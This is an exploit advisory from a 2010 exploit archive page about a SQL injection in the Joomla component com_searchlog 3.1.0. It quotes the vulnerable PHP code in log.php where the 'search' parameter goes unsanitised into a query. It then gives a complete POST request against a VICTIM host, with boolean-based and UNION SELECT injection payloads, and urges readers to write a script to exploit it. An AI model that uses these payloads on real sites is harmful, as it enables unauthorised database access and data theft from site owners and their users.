Joomla Component com_searchlog SQL Injection Vulnerability
Posted on 05 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_searchlog SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== Joomla Component com_searchlog SQL Injection Vulnerability ========================================================== #Exploit Title: Joomla Component com_searchlog SQL Injection #Date: 05/06/2010 #Author: d0lc3 d0lc3x[at]gmail[dom]com #Software Link: http://www.kanich.net/radio/site/searchlog/searchlog-download #Version: 3.1.0 #Tested on: Linux ubuntu32 2.6.32-22-generic x64 #Summary: Good nights, at this occassion we have other not-saned POST variable on administrator/components/com_searchlog/models/log.php, line 30: ... $search = $mainframe->getUserStateFromRequest($option . '.search', 'search', '', 'string'); //wtf!? $this->filter_actid = $mainframe->getUserStateFromRequest($option .'actid','actid',0,'int'); $data->search = JString::strtolower($search); //wtf!? $callbase = JRequest::getInt('callbase', 1); $newact =JRequest::getString('newact'); $data->newact = ""; if ($task=="" and $newact!="") { $data->newact = $newact; }if ($task == 'upload' or $task == 'savenew') { $data->sort = 'dates'; $limitstart = 0; }else { $data->sort = JRequest::getVar('sort', 'calls'); }if ($data->search) { $where[] = "(LOWER( m.call ) LIKE '$data->search%' OR LOWER( m.call ) LIKE '%/$data->search%')"; //likely SQLi ... In order to exploit it, i advice programming script for it :P but if only you want try vuln, to change POST request on HTTP header: http://VICTIM/administrator/index.php?option=com_searchlog&act=log POST /administrator/index.php?option=com_searchlog&act=log HTTP/1.1 Host: VICTIM Content-Type: application/x-www-form-urlencoded Content-Length: xxx search=[SQLi] &sort=calls&limit=20&limitstart=0&option=com_searchlog&act=log&task=&callbase=1&boxchecked=1&hidemainmenu=0 Where [SQLi] = someLogExisting') and 1=1# => true someLogExisting') and 1=2# => false UNION SQLi = someLogExisting') union select 1,2,3,4,5,6,7,8# # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
